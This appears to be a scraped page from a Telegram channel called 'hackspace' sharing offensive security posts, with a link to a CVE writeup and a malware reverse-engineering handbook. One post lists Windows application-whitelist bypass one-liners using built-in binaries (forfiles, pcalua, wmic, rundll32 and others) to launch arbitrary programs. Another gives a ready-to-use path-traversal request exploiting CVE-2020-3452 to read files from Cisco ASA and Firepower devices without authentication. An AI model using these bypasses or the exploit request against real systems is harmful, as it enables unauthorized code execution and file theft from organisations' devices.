hackspace
165 subscribers
283 photos
82 videos
25 files
1.02K links
hackspace
Download Telegram
🙃
Quick list of some app whitelist bypasses to try..

forfiles /p c:\windows\system32 /m notepad.exe /c <bin>

explorer.exe /root,"<bin>"

pcalua.exe -a <bin>

scriptrunner.exe -appvscript <bin>

wmic process call create <bin>

rundll32.exe advpack.dll, RegisterOCX <bin>
GitHub - Q4n/CVE-2020-1362: writeup of CVE-2020-1362
https://github.com/Q4n/CVE-2020-1362
Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.

For example to read "/+CSCOE+/portal_inc.lua" file.

https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

Happy Hacking!
Malware_Reverse_Engineering_Handbook.pdf
4.8 MB
Malware_Reverse_Engineering_Handbook.pdf